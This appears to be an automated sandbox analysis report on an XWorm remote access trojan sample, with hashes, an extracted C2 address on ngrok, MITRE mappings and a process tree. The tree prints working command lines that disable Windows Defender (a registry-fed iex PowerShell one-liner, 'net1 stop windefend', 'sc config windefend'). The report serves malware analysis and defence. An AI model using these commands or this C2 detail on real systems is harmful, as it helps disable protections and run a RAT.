xworm | 73f6543eb0648b63f8f2f0920c3fd9d968d43c367758b45a6133dd181fa81e88

Resubmissions

20/12/2023, 05:27

231220-f5ndaadfap 10

20/12/2023, 05:24

231220-f37ddadecp 10

Analysis

max time kernel
94s
max time network
104s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
20/12/2023, 05:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient.exe
Size

33KB
MD5

66bd8238a2177758528a96b77ea090cf
SHA1

17a6c0f87a9e17d4bd2220818cae3c6797a1b222
SHA256

73f6543eb0648b63f8f2f0920c3fd9d968d43c367758b45a6133dd181fa81e88
SHA512

ed3ee27edb2768dcf3ae71f37c451b495f518847f18bc997b92857ae15fb3bf410984ba1ff88272f6e0f3326273b2574d09946d2ea4c1135497c67069338aa54
SSDEEP

384:6E8PQ9Ba+vNuntf98d6ILj7CM42pfL3iB7OxVqWmRApkFXBLTsOZwpGN2v99IkuY:EUa+vNohsXn42JiB70cVF49jeOjhabs

Score

10^/10

xworm evasion rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

2.tcp.ngrok.io:19809

Mutex

cuIs5agEciWOTAUC

Attributes

install_file
USB.exe

aes.plain

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/4676-6-0x00000000027A0000-0x00000000027AE000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4676-0-0x0000000000350000-0x000000000035E000-memory.dmp	family_xworm

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	XClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	XClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	XClient.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4676 created 708	4676	XClient.exe	1

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1568	sc.exe
3724	sc.exe
4724	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4676	XClient.exe
4676	XClient.exe
4676	XClient.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
2484	powershell.exe
2484	powershell.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	4676	XClient.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	3192	whoami.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	1172	whoami.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeShutdownPrivilege	4676	XClient.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 1568	4676	XClient.exe	83
PID 4676 wrote to memory of 1568	4676	XClient.exe	83
PID 4676 wrote to memory of 1840	4676	XClient.exe	84
PID 4676 wrote to memory of 1840	4676	XClient.exe	84
PID 4676 wrote to memory of 3192	4676	XClient.exe	86
PID 4676 wrote to memory of 3192	4676	XClient.exe	86
PID 4676 wrote to memory of 804	4676	XClient.exe	87
PID 4676 wrote to memory of 804	4676	XClient.exe	87
PID 4676 wrote to memory of 1464	4676	XClient.exe	88
PID 4676 wrote to memory of 1464	4676	XClient.exe	88
PID 4676 wrote to memory of 4764	4676	XClient.exe	89
PID 4676 wrote to memory of 4764	4676	XClient.exe	89
PID 4764 wrote to memory of 3724	4764	powershell.exe	91
PID 4764 wrote to memory of 3724	4764	powershell.exe	91
PID 4764 wrote to memory of 2360	4764	powershell.exe	92
PID 4764 wrote to memory of 2360	4764	powershell.exe	92
PID 4764 wrote to memory of 1172	4764	powershell.exe	94
PID 4764 wrote to memory of 1172	4764	powershell.exe	94
PID 4764 wrote to memory of 4232	4764	powershell.exe	95
PID 4764 wrote to memory of 4232	4764	powershell.exe	95
PID 4764 wrote to memory of 4724	4764	powershell.exe	96
PID 4764 wrote to memory of 4724	4764	powershell.exe	96
PID 4676 wrote to memory of 2484	4676	XClient.exe	97
PID 4676 wrote to memory of 2484	4676	XClient.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4764
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:3724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:2360
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    PID:4232
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    PID:4724

C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" qc windefend
  2⤵
  - Launches sc.exe
  PID:1568
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
  2⤵
  PID:1840
- C:\Windows\system32\whoami.exe
  "C:\Windows\system32\whoami.exe" /groups
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3192
- C:\Windows\system32\net1.exe
  "C:\Windows\system32\net1.exe" start TrustedInstaller
  2⤵
  PID:804
- C:\Windows\system32\net1.exe
  "C:\Windows\system32\net1.exe" start lsass
  2⤵
  PID:1464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
22e796539d05c5390c21787da1fb4c2b

SHA1
55320ebdedd3069b2aaf1a258462600d9ef53a58

SHA256
7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

SHA512
d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
30e02b803a8a3a143eea476d7ab245a1

SHA1
d3bf1f568172e8125effe5b29bb57a8f9483fbb7

SHA256
b70c5f6cb630103fa7a96bdde12ab6a2fd0ff0fd026b61dc1123e46f9fdc44c4

SHA512
2a1dcf83e601c0b6969898767d2f85689f9e483922658f6e4a09f993cda75106f46a8e3a0cdd787710a203c162b4b508f84bd05585b3d18377c9491eb08e0dee

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ufoa43p3.x5a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2484-49-0x00007FFA8AE80000-0x00007FFA8B942000-memory.dmp

Filesize
10.8MB

Download
memory/2484-47-0x000001F6F6640000-0x000001F6F6650000-memory.dmp

Filesize
64KB

Download
memory/2484-36-0x000001F6F6640000-0x000001F6F6650000-memory.dmp

Filesize
64KB

Download
memory/2484-37-0x000001F6F6640000-0x000001F6F6650000-memory.dmp

Filesize
64KB

Download
memory/2484-35-0x00007FFA8AE80000-0x00007FFA8B942000-memory.dmp

Filesize
10.8MB

Download
memory/4676-6-0x00000000027A0000-0x00000000027AE000-memory.dmp

Filesize
56KB

Download
memory/4676-0-0x0000000000350000-0x000000000035E000-memory.dmp

Filesize
56KB

Download
memory/4676-17-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

Filesize
64KB

Download
memory/4676-1-0x00007FFA8AE80000-0x00007FFA8B942000-memory.dmp

Filesize
10.8MB

Download
memory/4676-16-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

Filesize
64KB

Download
memory/4676-2-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

Filesize
64KB

Download
memory/4676-3-0x0000000002650000-0x000000000265C000-memory.dmp

Filesize
48KB

Download
memory/4676-4-0x00007FFA8AE80000-0x00007FFA8B942000-memory.dmp

Filesize
10.8MB

Download
memory/4676-5-0x000000001B2B0000-0x000000001B2C0000-memory.dmp

Filesize
64KB

Download
memory/4676-15-0x000000001C3B0000-0x000000001C3D2000-memory.dmp

Filesize
136KB

Download
memory/4764-28-0x0000011C1A4B0000-0x0000011C1A4C0000-memory.dmp

Filesize
64KB

Download
memory/4764-33-0x00007FFA8AE80000-0x00007FFA8B942000-memory.dmp

Filesize
10.8MB

Download
memory/4764-30-0x0000011C1A4B0000-0x0000011C1A4C0000-memory.dmp

Filesize
64KB

Download
memory/4764-27-0x0000011C1A4B0000-0x0000011C1A4C0000-memory.dmp

Filesize
64KB

Download
memory/4764-29-0x0000011C1A4B0000-0x0000011C1A4C0000-memory.dmp

Filesize
64KB

Download
memory/4764-26-0x00007FFA8AE80000-0x00007FFA8B942000-memory.dmp

Filesize
10.8MB

Download